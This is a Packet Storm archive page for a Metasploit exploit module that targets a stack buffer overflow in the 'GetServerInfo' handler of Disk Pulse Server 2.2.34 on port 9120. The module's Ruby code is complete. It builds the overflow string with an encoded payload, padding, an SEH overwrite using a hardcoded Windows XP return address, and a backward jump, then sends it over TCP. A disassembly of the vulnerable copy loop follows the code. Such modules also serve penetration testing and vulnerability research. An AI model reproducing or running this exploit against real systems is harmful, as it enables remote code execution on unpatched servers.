Twenty Year Anniversary

Disk Pulse Server 2.2.34 Buffer Overflow

Disk Pulse Server 2.2.34 Buffer Overflow
Posted Sep 15, 2017
Authored by James Fitts | Site metasploit.com

This Metasploit module exploits a buffer overflow vulnerability found in libpal.dll of Disk Pulse Server version 2.2.34. The overflow is triggered when sending an overly long 'GetServerInfo' request to the service listening on port 9120.

tags | exploit, overflow
MD5 | 4fe44206eb458c215a59974aae93f192

Disk Pulse Server 2.2.34 Buffer Overflow

Change Mirror Download
require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
Rank = GreatRanking

include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::Seh

def initialize(info = {})
super(update_info(info,
'Name' => 'Disk Pulse Server \'GetServerInfo\' Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow vulnerability found
in libpal.dll of Disk Pulse Server v2.2.34. The overflow
is triggered when sending an overly long 'GetServerInfo'
request to the service listening on port 9120.
},
'Author' => [ 'James Fitts' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: $',
'References' =>
[
[ 'BID', '43919' ],
[ 'URL', 'http://www.saintcorporation.com/cgi-bin/exploit_info/disk_pulse_getserverinfo' ],
[ 'URL', 'http://www.coresecurity.com/content/disk-pulse-server-getserverinfo-request-buffer-overflow-exploit-10-5' ]
],
'Privileged' => true,
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Payload' =>
{
'Space' => 300,
'BadChars' => "\x00\x0a\x0d\x20",
'DisableNops' => 'True',
'StackAdjustment' => -3500,
'Compat' =>
{
'SymbolLookup' => 'ws2ord',
}
},
'Platform' => 'win',
'Targets' =>
[
[
'Windows XP SP3 EN',
{
# p/p/r
# libspp.dll
'Ret' => 0x1006f71f,
'Offset' => 303
}
],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Oct 19 2010'))

register_options([Opt::RPORT(9120)], self.class)
end

def exploit
connect

sploit = "GetServerInfo"
sploit << "\x41" * 8
sploit << payload.encoded
sploit << "\x42" * (303 - (8 + payload.encoded.length))
sploit << generate_seh_record(target.ret)
sploit << make_nops(4)
sploit << "\xe9\xc4\xfe\xff\xff" # jmp $-311
sploit << rand_text_alpha_upper(200)

print_status("Trying target #{target.name}...")

sock.put(sploit)

handler
disconnect
end

end
__END__
0033C05C 55 PUSH EBP
0033C05D 8B6C24 1C MOV EBP,DWORD PTR SS:[ESP+1C]
0033C061 3AC2 CMP AL,DL
0033C063 74 14 JE SHORT libpal.0033C079
0033C065 3C 0D CMP AL,0D
0033C067 74 10 JE SHORT libpal.0033C079
0033C069 3C 0A CMP AL,0A
0033C06B 74 0C JE SHORT libpal.0033C079
0033C06D 41 INC ECX
0033C06E 88042F MOV BYTE PTR DS:[EDI+EBP],AL
0033C071 47 INC EDI
0033C072 8A0431 MOV AL,BYTE PTR DS:[ECX+ESI]
0033C075 84C0 TEST AL,AL
0033C077 ^75 E8 JNZ SHORT libpal.0033C061
0033C079 C6042F 00 MOV BYTE PTR DS:[EDI+EBP],0
0033C07D 5D POP EBP
0033C07E 5F POP EDI
0033C07F 890B MOV DWORD PTR DS:[EBX],ECX
0033C081 5E POP ESI
0033C082 B8 01000000 MOV EAX,1
0033C087 5B POP EBX
0033C088 C3 RETN

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

Want To Donate?


Bitcoin: 18PFeCVLwpmaBuQqd5xAYZ8bZdvbyEWMmU

File Archive:

July 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    1 Files
  • 2
    Jul 2nd
    26 Files
  • 3
    Jul 3rd
    15 Files
  • 4
    Jul 4th
    11 Files
  • 5
    Jul 5th
    13 Files
  • 6
    Jul 6th
    4 Files
  • 7
    Jul 7th
    4 Files
  • 8
    Jul 8th
    1 Files
  • 9
    Jul 9th
    16 Files
  • 10
    Jul 10th
    15 Files
  • 11
    Jul 11th
    32 Files
  • 12
    Jul 12th
    22 Files
  • 13
    Jul 13th
    15 Files
  • 14
    Jul 14th
    1 Files
  • 15
    Jul 15th
    1 Files
  • 16
    Jul 16th
    21 Files
  • 17
    Jul 17th
    10 Files
  • 18
    Jul 18th
    0 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close